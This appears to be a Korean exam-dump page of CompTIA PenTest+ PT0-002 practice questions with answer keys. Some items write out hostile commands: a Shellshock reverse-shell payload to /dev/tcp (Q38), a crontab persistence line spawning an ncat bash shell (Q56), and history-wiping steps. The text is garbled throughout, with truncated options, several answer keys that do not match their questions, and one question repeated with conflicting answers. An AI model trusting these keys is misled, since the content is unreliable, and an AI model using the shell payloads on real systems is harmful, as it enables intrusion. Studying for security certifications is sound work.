아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

효과적인 준비를 위한 최신 CompTIA PenTest+ PT0-002 시험 문제

광범위한 시험 문제와 정답 모음, 세심하게 제작된 시험 문제, 유용한 시험 자료가 여러분의 여정을 지원합니다. 시험에서 테스트하는 모든 주요 주제를 다루도록 설계된 종합적인 학습 자료를 사용하여 자신 있게 준비하세요. 모의 침투 테스트 방법론부터 취약성 평가 및 관리에 이르기까지, 저희의 자료는 이해도를 높이고 시험 준비도를 높일 수 있도록 맞춤화되어 있습니다. 연습이 완벽을 만든다 모의 시험은 지식을 평가하고 시험 환경을 시뮬레이션할 수 있는 완벽한 도구입니다. 강점과 약점을 파악하고, 실력을 다듬어 자신 있게 시험 당일에 임하세요. 전문가의 안내와 최고 수준의 학습 자료를 통해, 당신은 CompTIA PenTest+ PT0-002 시험에 합격하고 사이버 보안 경력을 새로운 차원으로 끌어올릴 수 있습니다. 성공적인 시험 경험을 위해 지금 바로 준비를 시작하세요!
다른 온라인 시험에 응시하세요

질문 #1
한 모의 침투 테스터가 검색 통과를 통해 경로에 업로드할 수 있는 취약점을 발견했습니다. 이 취약점을 통해 발견된 파일 중 일부는 다음과 같습니다.다음 중 공격자가 영향을 받는 시스템에 대한 내부 액세스 권한을 얻는 데 가장 좋은 방법은 무엇인가요?
A. 감한 고객 데이터의 공개 액세스 여부
B. 라우드와 클라이언트 간의 연결이 안전한지 여부
C. 객사 직원이 플랫폼 사용에 대한 적절한 교육을 받았는지 여부
D. 라우드 애플리케이션이 보안 SDLC를 사용하여 개발되었는지 여부
답변 보기
정답: C
질문 #2
한 소프트웨어 회사가 회사의 소프트웨어 개발 관행의 보안을 평가하기 위해 보안 컨설턴트를 고용했습니다. 컨설턴트는 소프트웨어 바이너리에 대해 퍼징을 수행하여 정찰을 시작하기로 결정했습니다. 다음 중 보안 컨설턴트가 발견할 가능성이 가장 높은 취약점은 무엇인가요?
A. 약한 인증 체계
B. 자열에 저장된 자격 증명
C. 퍼 오버플로
D. 적화되지 않은 리소스 관리
답변 보기
정답: C
질문 #3
다음 중 개발자에게 보내는 애플리케이션 보안 평가 보고서에 포함될 가능성이 가장 높은 정보 유형은 무엇인가요? (두 가지를 선택하세요.)
A. ydra
B. 더 리퍼
C. 인과 아벨
D. 두사
답변 보기
정답: BC
질문 #4
침투 테스터에게 192.168.1.0/24 범위의 일련의 표적을 공격하여 가능한 한 적은 경보와 대응 조치를 트리거하라는 임무가 주어졌습니다. 다음 중 이 목표를 가장 잘 달성할 수 있는 Nmap 스캔 구문은 무엇인가요?
A. map ג
B. map sV 192
C. map ג
D. map ג
답변 보기
정답: D
질문 #5
침투 테스터는 침투 테스트가 끝나면 흔적을 정리하고 덮고 있습니다. 다음 중 테스터가 시스템에서 반드시 제거해야 하는 것은 무엇인가요? (두 개를 선택하세요.)
A. 스폰된 포탄
B. 생성된 사용자 계정
C. 서버 로그
D. 관리자 계정
E. 시스템 재부팅
F. ARP 캐시
답변 보기
정답: BC
질문 #6
한 메일 서비스 회사가 이전 직원 계정이 여전히 활성 상태인지 확인하기 위해 침투 테스터를 고용하여 SMTP 서버의 모든 사용자 계정 열거를 수행했습니다. 이 목표를 달성하기 위해 다음 중 어떤 명령을 사용해야 하나요?
A. RFY 및 EXPN
B. RFY 및 TURN
C. XPN 및 TURN
D. CPT TO 및 VRFY
답변 보기
정답: A
질문 #7
침투 테스트자가 손상된 웹 서버에서 Java 애플리케이션 파일을 다운로드하고 다음 로그를 보고 해당 파일을 호출하는 방법을 확인합니다.다음 중 침투 테스트자가 Java 애플리케이션이 소켓을 통한 암호화를 사용하는지 확인하기 위해 따라야 하는 단계의 순서는?
A. 애플리케이션 취약성 검사를 실행한 다음 애플리케이션에서 사용하는 TCP 포트를 식별합니다
B. 디버거에 연결된 애플리케이션을 실행한 다음 애플리케이션의 로그를 검토합니다
C. 바이너리 코드를 분해한 다음 중단점을 식별합니다
D. Wireshark로 패킷 캡처를 시작한 다음 애플리케이션을 실행합니다
답변 보기
정답: D
질문 #8
모의 침투 테스터가 평가를 완료하고 테스트 중에 생성된 모든 아티팩트와 계정을 제거한 후 고객에게 결과를 제시했습니다. 다음 중 다음에는 어떤 일이 발생하나요?
A. 침투 테스터가 재테스트를 실시합니다
B. 모의 침투 테스트는 클라이언트 시스템에서 모든 스크립트를 삭제합니다
C. 라이언트가 시스템에 패치를 적용합니다
D. 클라이언트는 테스트 중에 생성된 시스템 로그를 지웁니다
답변 보기
정답: C
질문 #9
다음 중 모의 침투 테스터가 비상 연락처에 교전 사실을 알려야 하는 상황은 어느 것인가요?
A. 조직 내 중요 서버를 악용하는 팀입니다
B. 은 조직에서 PII 또는 신용 카드 데이터를 유출합니다
C. 이 원격으로 네트워크에 액세스하지 못합니다
D. 이 네트워크의 시스템에서 다른 액터를 발견합니다
답변 보기
정답: D
질문 #10
모의 침투 테스터가 회사의 최고 법률 고문에게 MITRE ATT&CK 프레임워크를 설명하고 있습니다.다음 중 테스터가 이 프레임워크의 장점으로 가장 많이 설명할 수 있는 것은 무엇입니까?
A. 보안 침입의 전술을 이해하면 침입을 차단하는 데 도움이 될 수 있습니다
프레임워크의 일부인 B. 크립트는 SIEM 도구로 직접 가져올 수 있습니다
C. 방법론은 사고 비용을 더 잘 추정하는 데 사용할 수 있습니다
D. 레임워크는 정적이며 시간이 지나도 보안 프로그램의 안정성을 보장합니다
답변 보기
정답: A
질문 #11
다음 중 모의 침투 테스트 중에 수행되는 구체적인 단계와 접근 방식을 정의하는 개념은 무엇인가요?
A. 범위 세부 정보
B. 과
C. 법론
D. 업 내역서
답변 보기
정답: C
질문 #12
모의 침투 테스트자가 웹 애플리케이션에 대한 수동 평가를 수행하는 동안 다음과 같은 유효한 URL을 발견했습니다: http://www.example.com/product.php?id=123987.Which 다음 자동화된 도구 중 이 URL의 취약점을 식별하기 위해 NEXT를 사용하는 것이 가장 좋겠습니까?
A. QLmap
B. essus
C. ikto
D. irBuster
답변 보기
정답: A
질문 #13
모의 침투 테스터가 웹 서버에 대한 취약점 스캔을 완료하고 단일하지만 심각한 취약점을 확인했습니다.다음 중 이것이 진정한 양성인지 확인하는 가장 좋은 방법은 무엇입니까?
A. 다른 스캐너를 실행하여 비교합니다
B. 서버에서 수동 테스트를 수행합니다
C. 캐너에서 결과를 확인합니다
D. 라인에서 취약점을 찾아보세요
답변 보기
정답: B
질문 #14
드래그 앤 드롭(드래그 앤 드롭은 지원되지 않음)모의 침투 테스트 중에 사용자 인터페이스가 제한된 시스템에 액세스할 수 있습니다. 이 시스템은 포트 스캔하려는 격리된 네트워크에 액세스할 수 있는 것으로 보입니다.지침코드 세그먼트를 분석하여 포트 스캔 스크립트를 완료하는 데 필요한 섹션을 결정하고, 적절한 요소를 올바른 위치로 드래그하여 스크립트를 완료합니다.언제든지 시뮬레이션의 초기 상태로 되돌리려면 다시
A. 답변은 설명 섹션을 참조하세요
답변 보기
정답: A
질문 #15
모의 침투 테스터가 샌드박스 환경에서 새 버전의 모바일 애플리케이션을 테스트하고 있습니다. 애플리케이션과 외부 API 간의 트래픽을 가로채고 해독하기 위해 테스터는 비공개 루트 CA를 생성하고 인증서를 발급했습니다. 테스터가 테스트에 사용된 스마트폰의 신뢰할 수 있는 스톤에 루트 CA를 설치했지만 애플리케이션에 인증서 불일치를 나타내는 오류가 표시되고 서버에 연결되지 않습니다. 다음 중 가장 가능성이 높은 이유는 무엇인가요?
방화벽에서 A. CP 포트 443이 열려 있지 않습니다
B. API 서버가 TLS 대신 SSL을 사용 중입니다
C. 테스터가 오래된 버전의 애플리케이션을 사용하고 있습니다
D. 애플리케이션에 API 인증서가 고정되어 있습니다
답변 보기
정답: D
질문 #16
한 사설 조사 회사가 공격자가 모바일 장치에 액세스한 다음 해당 장치에서 데이터를 유출할 수 있는 가능성을 확인하기 위해 모의 침투 테스트를 요청하고 있습니다. 다음 중 성공할 경우 두 가지 목표를 모두 달성할 가능성이 가장 높은 사회 공학 방법은 무엇인가요?
A. 성 애플리케이션 다운로드 링크가 포함된 스푸핑된 서비스 번호가 포함된 SMS를 전송합니다
B. DM의 취약점을 악용하여 새 계정 및 장치 프로필을 만듭니다
C. T 헬프 데스크에서 비싱을 수행하여 가장을 위해 승인된 디바이스 IMEI 목록을 수집합니다
직원들이 자주 사용하는 웹사이트에 x86 아키텍처를 겨냥한 멀웨어를 감염시킵니다.
답변 보기
정답: A
질문 #17
보안 전문가가 TCP 포트 3011에서 수신 중인 독점 서비스에 유효하지 않은 패킷을 전송하여 IoT 장치를 테스트하려고 합니다. 다음 중 보안 전문가가 임의의 숫자를 사용하여 TCP 헤더 길이와 체크섬을 프로그래밍 방식으로 쉽게 조작하고 독점 서비스가 어떻게 응답하는지 관찰할 수 있는 방법은?
A. map
B. cpdump
C. capy
D. ping3
답변 보기
정답: C
질문 #18
침투 테스터가 온패스 공격 위치를 설정했으며 이제 대상 호스트로 다시 보낼 DNS 쿼리 응답을 특별히 제작해야 합니다.다음 중 이 목표를 가장 잘 지원하는 유틸리티는 무엇입니까?
A. ocat
B. cpdump
C. capy
D. ig
답변 보기
정답: C
질문 #19
다음 중 회사의 채용팀이 최종 보고서에서 가장 보고 싶어하는 것은 무엇인가요?
A. 요약
B. 격 TTP
C. 법론
D. 위 세부 정보
답변 보기
정답: B
질문 #20
회사에서 요청한 평가를 수행하는 모의 침투 테스터가 이중 태깅을 고소하는 다른 시스템으로 트래픽을 보내려고 하는데, 다음 중 이 목표를 가장 잘 달성할 수 있는 기술은 무엇입니까?
A. FID 복제
B. FID 태깅
C. 타 태깅
D. 그 중첩
답변 보기
정답: D
질문 #21
최고 정보 보안 책임자는 모의 침투 테스터가 회사 직원의 보안 인식 수준을 평가하기를 원합니다.다음 중 테스터가 이 목표를 달성하는 데 도움이 될 수 있는 도구는 어느 것입니까?
A. 타스플로잇
B. ydra
C. ET
D. PScan
답변 보기
정답: C
질문 #22
한 회사가 모의 침투 테스트 팀을 고용하여 제조 공장의 사이버 물리 시스템을 검토했습니다. 이 팀은 즉시 감독 시스템과 PLC가 모두 회사 인트라넷에 연결되어 있음을 발견했습니다.침투 테스트 팀이 다음 중 가장 타당할 가능성이 높은 가정은?
A. PLC는 네트워크를 통해 주입된 명령에 따라 동작하지 않습니다
B. 감독자와 컨트롤러는 기본적으로 별도의 가상 네트워크에 있습니다
C. 컨트롤러는 명령의 출처를 확인하지 않습니다
D. 감독 시스템이 악의적인 코드/명령 주입을 감지합니다
답변 보기
정답: C
질문 #23
침투 테스터가 다음 스크립트를 작성합니다:다음 중 테스터가 수행하는 작업은 무엇입니까?
A. 비스 취약점 검색
B. 실된 바인드 셸 복구 시도 중
C. 정된 포트에서 리버스 셸 수신 구축하기
D. 트워크에서 특정 개방형 포트 검색하기
답변 보기
정답: D
질문 #24
고객사의 건물 내 보안실에 접근하기 위해 물리적 침투 테스트를 수행하기 위해 침투 테스터를 고용했습니다. 외부 정찰을 통해 두 개의 출입구, WiFi 게스트 네트워크, 인터넷에 연결된 여러 대의 보안 카메라를 확인했습니다.다음 중 추가 정찰을 가장 잘 지원하는 도구 또는 기법은 무엇입니까?
A. 드라이빙
B. 단
C. econ-ng
D. 어크랙
답변 보기
정답: B
질문 #25
Nmap 스캔은 웹 서버와 데이터베이스의 열린 포트를 보여줍니다. 모의 침투 테스터는 취약점과 해당 시스템에 대한 추가 정보를 식별하기 위해 WPScan 및 SQLmap을 실행하기로 결정합니다.다음 중 모의 침투 테스터가 수행하려고 하는 것은 무엇입니까?
A. 수집된 증거를 바탕으로 잠재적인 범죄 행위를 밝혀내세요
B. 환경의 모든 취약점을 파악합니다
C. 위에 따라 침습성을 제한합니다
D. 사 결과의 기밀을 유지합니다
답변 보기
정답: B
질문 #26
한 회사에서 네트워크에 악성 액세스 포인트를 배포하고 설정하기 위해 침투 테스터를 고용했습니다.다음 중 이 목표를 달성하기 위해 가장 적합한 도구는 무엇입니까?
A. 이어샤크
B. 어크랙
C. ismet
D. ifite
답변 보기
정답: B
질문 #27
Nmap 네트워크 스캔에서 서비스가 식별된 5개의 열린 포트를 발견했습니다. 다음 중 모의 침투 테스터가 다음 중 어떤 도구를 사용하여 열린 포트에 관련 익스플로잇이 있는 취약점이 존재하는지 확인해야 하나요?
A. penVAS
B. 로저
C. urp Suite
D. WASP ZAP
답변 보기
정답: A
질문 #28
침투 테스터가 시스템에 액세스하여 지속성을 설정한 다음 다음 명령을 실행합니다.다음 중 테스터가 수행했을 가능성이 가장 높은 작업은 무엇인가요?
A. Bash 히스토리를 /dev/null로 리디렉션하기
B. 추가 열거를 위해 사용자의 Bash 히스토리 복사본 만들기
C. ash 기록을 삭제하여 흔적 감추기
D. 고 대응자를 혼란스럽게 하기 위해 시스템에 미끼 파일 만들기
답변 보기
정답: C
질문 #29
침투 테스터가 다음 스크립트를 작성합니다:다음 중 테스터가 달성하려고 하는 목표는 무엇입니까?
A. 네트워크에서 활성 호스트를 확인합니다
B. 텔스를 위해 핑 패킷의 TTL을 설정합니다
C. 트워크에 연결된 디바이스의 ARP 테이블을 채웁니다
D. 장 많이 사용하는 포트에서 시스템을 스캔합니다
답변 보기
정답: A
질문 #30
침투 테스터가 시스템에 액세스하여 지속성을 설정한 다음 다음 명령을 실행합니다.다음 중 테스터가 수행했을 가능성이 가장 높은 작업은 무엇인가요?
A. Bash 히스토리를 /dev/null로 리디렉션하기
B. 추가 열거를 위해 사용자의 Bash 히스토리 복사본 만들기
C. ash 기록을 삭제하여 흔적 감추기
D. 고 대응자를 혼란스럽게 하기 위해 시스템에 미끼 파일 만들기
답변 보기
정답: C
질문 #31
모의 침투 테스터는 잠긴 출입문, 보안팀, 카메라로 경비되는 건물에 접근해야 합니다. 다음 중 테스터가 탐지되지 않고 IT 프레임워크에 액세스하기 위해 사용할 수 있는 기법은 무엇입니까?
A. 물쇠를 선택하세요
B. 원격으로 카메라를 비활성화합니다
C. 배 배달원을 사칭합니다
D. 싱 이메일 보내기
답변 보기
정답: C
질문 #32
이전 시스템에 대한 액세스 권한을 얻은 후, 침투 테스터가 네트워크에 대한 Nmap 검사를 실행하여 다음과 같은 결과를 얻습니다:테스터는 이전에 익스플로잇된 시스템에서 다음 명령을 실행하지만 실패합니다:다음 중 명령이 실패한 이유를 설명하는 것은 무엇입니까?
A. 성 스캔
B. ing 스윕
C. 로토콜 반전
D. 킷 분석
답변 보기
정답: A
질문 #33
침투 테스터가 무선 네트워크를 평가하고 있습니다. 테스터가 올바른 채널과 SSID를 모니터링하고 있지만 클라이언트와 AP 간의 핸드셰이크를 캡처할 수 없습니다. 다음 중 모의 침투 테스터가 핸드셰이크를 캡처하는 데 가장 효과적인 공격은 무엇입니까?
A. 재설치
B. 증 해제
C. 블 트윈
D. eplay
답변 보기
정답: B
질문 #34
모의 침투 테스터가 평가를 위해 범위가 지정된 16비트 네트워크 블록을 받았습니다. 평가 중에 테스터는 제공된 IP 블록에 활성화된 호스트가 없음을 발견하고 이를 회사에 보고했습니다. 그 후 회사는 테스터에게 업데이트된 IP 블록을 제공했습니다. 다음 중 가장 적절한 다음 단계는 무엇인가요?
A. 계약을 해지합니다
B. 새 서명으로 ROE를 업데이트합니다
C. 비트 블록을 스캔하여 누락된 호스트를 추가로 매핑합니다
D. 가를 계속 진행합니다
답변 보기
정답: B
질문 #35
침투 테스터는 클라이언트와 서버 간의 NTLM 챌린지-응답 트래픽을 캡처할 수 있습니다.다음 중 서버에 액세스하기 위해 PCAP로 수행할 수 있는 작업은 무엇입니까?
A. 수직 권한 상승을 수행합니다
B. 캡처한 트래픽을 서버로 재생하여 세션을 다시 생성합니다
C. 더 리퍼를 사용하여 비밀번호를 해독합니다
D. 스 더 해시 공격을 활용합니다
답변 보기
정답: D
질문 #36
다음 중 OWASP Top 10을 가장 잘 설명하는 것은 무엇인가요? (두 가지를 선택하세요.)
A. 애플리케이션의 가장 중요한 위험
B. 애플리케이션의 모든 위험 목록
C. 요도 순으로 정의된 위험
D. 웹 애플리케이션 보안 표준
E. 리스크 거버넌스 및 규정 준수 프레임워크
아파치 취약점 체크리스트 F.
답변 보기
정답: AC
질문 #37
컨설턴트가 간헐적인 연결 문제를 보고받은 후 다음 결과를 검토하고 있습니다. 다음 중 컨설턴트가 보고한 문제일 가능성이 가장 높은 것은 무엇인가요?
A. 네트워크의 디바이스가 잘못된 서브넷에 IP 주소를 가지고 있습니다
B. 잘못된 멀티캐스트 그룹을 사용하여 멀티캐스트 세션이 시작되었습니다
C. RP 플러딩 공격은 브로드캐스트 주소를 사용하여 DDoS를 수행하는 것입니다
네트워크의 디바이스가 ARP 캐시를 오염시켰습니다.
답변 보기
정답: D
질문 #38
모의 침투 테스트가 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 전송하는 Python 스크립트를 편집하고 다음 코드를 발견합니다: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}다음 중 테스터가 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 스크립트를 수정해야 하는 것은 무엇입니까?
A. xploit = {사용자-에이전트: () { 무시;};/bin/bash -i id;누가미, 수락: 텍스트/html,애플리케이션/xhtml +xml,애플리케이션/xml 문서}
B. xploit = {사용자-에이전트: () { 무시;};/bin/bash -i>& find / -perm -4000, 수락: 텍스트/html,애플리케이션/xhtml +xml,애플리케이션/xmlג}
C. xploit = {사용자-에이전트: () { 무시;};/bin/sh -i ps -efג€ 0>&1, 허용: 텍스트/html,애플리케이션/xhtml +xml,애플리케이션/xmlג€}
D. xploit = {사용자-에이전트: () { 무시;};/bin/bash -i>& /dev/tcp/10
답변 보기
정답: A
질문 #39
웹 사이트에서 모의 침투 테스트를 수행하는 테스터가 다음과 같은 출력을 받습니다:경고: mysql_fetch_array()는 /var/www/search.php의 62줄에 주어진 매개 변수 1이 자원, 부울일 것으로 예상합니다다음 중 웹 사이트를 추가로 공격하는 데 사용할 수 있는 명령은 무엇입니까?
A. 상 호스트에 액세스하여 이를 위해 특별히 제작된 멀웨어를 심습니다
B. 컬 DNS 서버를 익스플로잇하고 스푸핑된 A 레코드로 영역 레코드를 추가/업데이트합니다
C. capy 유틸리티를 사용하여 DNS 쿼리 응답의 이름 확인 필드를 덮어씁니다
대상 호스트에서 스푸핑된 호스트의 호스트에 대한 D. roxy HTTP 연결
답변 보기
정답: D
질문 #40
보안 평가를 수행 중인 모의 침투 테스터가 사이버 범죄자들이 중요한 취약점을 적극적으로 악용하고 있음을 발견했습니다.다음 중 테스터가 다음에 수행해야 하는 작업은 무엇입니까?
A. 주 연락 담당자에게 연락하세요
B. 공격자를 쓰러뜨리세요
C. 시 법 집행 기관에 신고합니다
D. 절한 증거를 수집하여 최종 보고서에 추가합니다
답변 보기
정답: A
질문 #41
다음 중 애플리케이션 개발자 팀을 대상으로 작성된 정적 애플리케이션 보안 테스트의 최종 보고서에 가장 중요하게 포함해야 하는 것은 무엇인가요?
A. 사용된 침투 테스트 방법 요약
B. 가 중 발생한 소모품, 하도급 계약 및 비용을 포함한 자재 명세서
C. 공적인 소프트웨어 침해가 발생했을 때의 정량적 영향 평가
안전하지 않은 타입 캐스팅 작업의 인스턴스에 대한 D. ode 컨텍스트
답변 보기
정답: C
질문 #42
모의 침투 테스트자가 한 번의 모의 침투에 사용하기 위해 다음 스크립트를 작성했습니다.이 스크립트가 수행하는 작업은 다음 중 어느 것입니까?
A. 새로운 침투 테스트를 수행합니다
B. 조사 결과를 수정합니다
C. 반적인 취약점 및 노출 목록을 제공합니다
D. 투 테스트의 범위를 넓히세요
답변 보기
정답: A
질문 #43
Bash에서 해석을 위한 셸 스크립트를 개발할 때는 인터프리터 /bin/bash를 명시적으로 지정해야 합니다.이 목표를 달성하려면 다음 중 스크립트의 첫 줄에 사용해야 하는 문자 조합은 무엇입니까?
A. #
B. $
C. #
D. $
E. !
답변 보기
정답: E
질문 #44
모의 침투 테스터가 특정 도메인의 웹에서 사용할 수 있는 문서에서 숨겨진 정보를 찾고자 합니다. 침투 테스트자는 다음 중 어떤 것을 사용해야 하나요?
A. etcraft
B. entralOps
C. 답자
D. OCA
답변 보기
정답: D
질문 #45
규정 준수 기반 침투 테스트의 주요 관심사는 다음과 같습니다:
A. 보호된 네트워크에서 PII 획득
B. 엣지 디바이스에서 보호 우회
C. 특정 보안 표준 세트의 유효성을 결정합니다
D. 호된 네트워크에서 특정 정보를 얻는 행위
답변 보기
정답: C
질문 #46
한 회사가 네트워크 대역폭을 공유하는 클라우드 제공업체를 사용하여 전용 서버에서 웹 애플리케이션을 호스팅합니다. 이 회사는 클라우드 제공업체와의 접촉을 통해 클라우드 제공업체의 다른 고객을 방해할 수 있는 모든 활동을 방지합니다. 애플리케이션을 테스트하기 위해 침투 테스트 회사와 협력할 때 다음 중 회사가 피해야 하는 것은 무엇인가요?
A. 웹 애플리케이션의 URL을 크롤링하여 취약점 찾기
B. 애플리케이션 서버의 모든 IP 주소 핑거프린팅
C. 애플리케이션의 비밀번호 무차별 강제 입력
D. 초당 많은 웹 요청을 전송하여 DDoS 보호 테스트하기
답변 보기
정답: D
질문 #47
한 모의 침투 테스터가 간단한 파이썬 기반 스캐너를 실행했습니다. 다음은 코드의 일부입니다.다음 중 이 스크립트가 조직의 IDS에서 '포트 스캔 가능성' 경고를 트리거한 이유를 가장 잘 설명하는 것은 무엇인가요?
7줄의 A. ock
1줄의 B. range(1, 1025)는 포트 목록 목록을 숫자 순서대로 채웠습니다
C. 인 6은 소켓
D. emoteSvr 변수가 유형 힌트되거나 초기화되지 않았습니다
답변 보기
정답: B
질문 #48
제공된 정보가 계약 전, 계약 중, 계약 후에 어떻게 관리되는지 관리하기 위해 모의 침투 테스터와 클라이언트 간에 서명해야 하는 문서는 다음 중 어느 것인가요?
A. SA
B. DA
C. OW
D. OE
답변 보기
정답: B
질문 #49
모의 침투 테스터가 컴퓨터에서 언섀도우 명령을 실행합니다.다음 중 테스터가 사용할 가능성이 가장 높은 도구는 무엇입니까?
A. 더 리퍼
B. ydra
C. imikatz
D. 인과 아벨
답변 보기
정답: A
질문 #50
모의 침투 테스터가 모의 침투 테스트를 수행 중입니다. 테스터는 Linux 서버에서 루트 수준 셸을 획득하고 /home/svsacct 디렉터리에 있는 password.txt라는 파일에서 다음 데이터를 발견합니다:U3VQZXIkM2NyZXQhCg==다음 중 테스터가 파일 내용을 디코딩하기 위해 사용해야 하는 명령은?
A. cho U3VQZXIkM2NyZXQhCg== | base64 ג
B. ar zxvf password
C. ydra ג
D. ohn --wordlist /usr/share/seclists/rockyou
답변 보기
정답: A
질문 #51
교전 중 침투 테스트자가 파일 내에서 다음과 같은 문자열 목록을 발견했습니다.다음 중 문자열의 알려진 평문 텍스트를 확인하는 가장 좋은 기법은 무엇입니까?
A. 전 공격
B. 인보우 테이블 공격
C. 차별 대입 공격
D. 리덴셜 스터핑 공격
답변 보기
정답: B
질문 #52
침투 테스터가 회사 운영에 대한 중단을 최소화해야 하는 고객을 위한 활동을 준비 중입니다.다음 중 수동적 정찰 도구로 간주되는 것은 무엇입니까? (두 가지를 선택하십시오.)
A. map -P0 -T0 -sS 192
B. map -sA -sV --host-timeout 60 192
C. map -f --badsum 192
D. map -A -n 192
답변 보기
정답: AE
질문 #53
한 회사가 클라우드 서비스 제공업체가 소프트웨어 개발을 위한 가상 머신을 적절히 보호하지 못하고 있다고 우려하고 있습니다. 가상 머신은 다른 회사들과 물리적 리소스를 공유하는 데이터 센터에 보관되어 있습니다. 다음 중 이 회사가 가장 우려하는 공격 유형은 무엇입니까?
A. 이터 홍수
B. 션 라이딩
C. 이버 스쿼팅
D. 이드 채널
답변 보기
정답: D
질문 #54
모의 침투 테스터가 활성 시스템을 빠르게 식별하기 위해 클래스 C 네트워크를 검사하고 있습니다. 침투 테스터가 사용해야 하는 명령은 다음 중 어느 것인가요?
A. map -sn 192
B. map -sn 192
C. map -sn 192
D. map -sN 192
답변 보기
정답: B
질문 #55
다음 중 모의 침투 테스터가 침해한 Windows 서버에서 sdelete mimikatz 명령을 실행하는 이유를 설명하는 것은? * 명령을 실행하는 이유를 설명하는 것은?
A. 해시 크래킹 레지스트리 항목 제거하기
B. 테스터가 생성한 미미카츠 계정을 제거하려면 다음과 같이 하세요
C. 버에서 도구를 제거하려면
D. 스템에서 리버스 셸을 제거하려면
답변 보기
정답: C
질문 #56
침투 테스터가 모바일 클라이언트의 랩톱에서 Windows 워크스테이션에 성공적으로 액세스할 수 있었습니다.다음 중 테스터가 시스템에 대한 액세스 권한을 유지할 수 있도록 보장하기 위해 사용할 수 있는 방법은 무엇입니까?
A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate
B. wmic 시작 가져오기 캡션, 명령어
C. crontab -l; echo ?€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash?€) | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 사용자
답변 보기
정답: C
질문 #57
다음 중 가장 광범위한 대상 시스템 유형을 포괄하는 페이로드 모듈이 포함된 익스플로잇 제품군을 제공하는 것은 무엇인가요?
A. essus
B. 타스플로잇
C. urp Suite
D. thercap
답변 보기
정답: B
질문 #58
한 회사가 네트워크 대역폭을 공유하는 클라우드 제공업체를 사용하여 전용 서버에서 웹 애플리케이션을 호스팅합니다. 이 회사는 클라우드 제공업체와의 접촉을 통해 클라우드 제공업체의 다른 고객을 방해할 수 있는 모든 활동을 방지합니다. 애플리케이션을 테스트하기 위해 침투 테스트 회사와 협력할 때 다음 중 회사가 피해야 하는 것은 무엇인가요?
A. 애플리케이션의 URL을 크롤링하여 취약점 찾기
B. 플리케이션 서버의 모든 IP 주소 핑거프린팅
애플리케이션의 비밀번호를 강제 입력하는 C. rute
D. 당 많은 웹 요청을 전송하여 DDoS 보호 테스트하기
답변 보기
정답: D
질문 #59
다음 중 공격자가 사용하는 일반적인 전술 및 기법의 매트릭스와 권장되는 완화 방법을 제공하는 것은 무엇인가요?
A. IST SP 800-53
B. WASP 상위 10위
C. ITRE ATT&CK 프레임워크
D. TES 기술 가이드라인
답변 보기
정답: C
질문 #60
침투 테스터가 dig:...;; 응답 섹션comptia.org에 대한 다음 DNS 정찰 결과를 검토하고 있습니다. 3569 IN MX comptia.org-mail.protection.outlook.com. 3569 IN A 3.219.13.186. 3569 IN NS ns1.comptia.org. 3569 IN SOA 안식처. administrator.comptia.org. 3569 IN MX new.mx0.comptia.org. 3569 IN MX new.mx1.comptia.org.다음 중 침투 테스터가 이 출력을 기반으로 식별할 수 있는 잠재적 문제는 무엇입니까?
A. 기록 중 하나 이상이 범위를 벗어났습니다
B. 중복된 MX 레코드가 있습니다
C. NS 레코드가 적절한 도메인 내에 있지 않습니다
D. comptia
답변 보기
정답: A
질문 #61
클라우드 환경에서 모의 침투 테스트를 수행할 때 모의 침투 테스터가 가장 먼저 고려해야 할 사항은 다음 중 어느 것인가요?
A. 라우드 서비스 제공자가 침투 테스터의 환경 테스트를 허용하는지 여부
B. 플리케이션에서 특정 클라우드 서비스를 사용 중인지 여부
C. 라우드 서비스가 실행되는 지리적 위치
D. 라우드 서비스 소재 국가에 관련 법률이 있는지 여부
답변 보기
정답: A
질문 #62
한 모의 침투 테스터가 인터넷에 연결된 네트워크 디바이스에서 -F 옵션으로 Nmap 스캔을 실행한 결과 몇 개의 열린 포트를 발견했습니다. 추가 열거를 위해 테스터는 다음 명령을 사용하여 또 다른 스캔을 실행했습니다. nmap -O -A -sS -p- 100.100.100.50Nmap은 65,535개의 포트가 모두 필터링되었다고 반환했습니다.다음 중 두 번째 스캔에서 가장 가능성이 높은 것은 무엇인가요?
A. 방화벽 또는 IPS가 스캔을 차단했습니다
B. 침투 테스터가 지원되지 않는 플래그를 사용했습니다
C. 엣지 네트워크 장치의 연결이 끊어졌습니다
D. 스캔 결과 ICMP 에코 응답이 반환되었습니다
답변 보기
정답: A
질문 #63
클라우드 환경에서 모의 침투 테스트를 수행할 때 모의 침투 테스터가 가장 먼저 고려해야 할 사항은 다음 중 어느 것인가요?
A. 클라우드 서비스 제공업체가 모의 침투 테스터의 환경 테스트를 허용하는지 여부
B. 애플리케이션에서 특정 클라우드 서비스를 사용 중인지 여부
C. 클라우드 서비스가 실행되고 있는 지리적 위치
D. 클라우드 서비스 소재 국가에 관련 법률이 있는지 여부
답변 보기
정답: C
질문 #64
평가자는 가능한 한 조용하게 Nmap 스캔을 실행하려고 합니다. 다음 중 탐지 가능성이 가장 낮은 명령은 무엇인가요?
A. 열린 포트를 찾습니다
B. 버스 셸을 들어보세요
C. 린 포트에 침수를 시도합니다
D. 호화된 터널을 생성합니다
답변 보기
정답: C
질문 #65
모의 침투 테스터가 계약에 사용할 자격 증명을 찾기 위해 .pcap 파일을 받았는데, 다음 중 테스터가 .pcap 파일을 열고 읽기 위해 활용해야 하는 도구는 무엇인가요?
A. map
B. 이어샤크
C. 타스플로잇
D. etcat
답변 보기
정답: B
질문 #66
침투 테스트가 서버에 대한 스캔을 실행하고 다음 출력을 얻습니다.다음 중 침투 테스트가 다음에 시도해야 하는 명령 시퀀스는 무엇입니까?
A. tp 192
B. mbclient \\\\\\\\WEB3\\\\IPC$ -I 192
C. crack -u 관리자 -p 15worst_passwords
D. url -X TRACE https://192
답변 보기
정답: A
질문 #67
침투 테스터가 서버에서 MD5 해시를 수집하고 레인보우 테이블을 사용하여 해시를 쉽게 크랙할 수 있었습니다.다음 중 해결 보고서에 권장 사항으로 포함되어야 하는 것은?
A. 강력한 알고리즘 요구 사항
B. 버의 액세스 제어
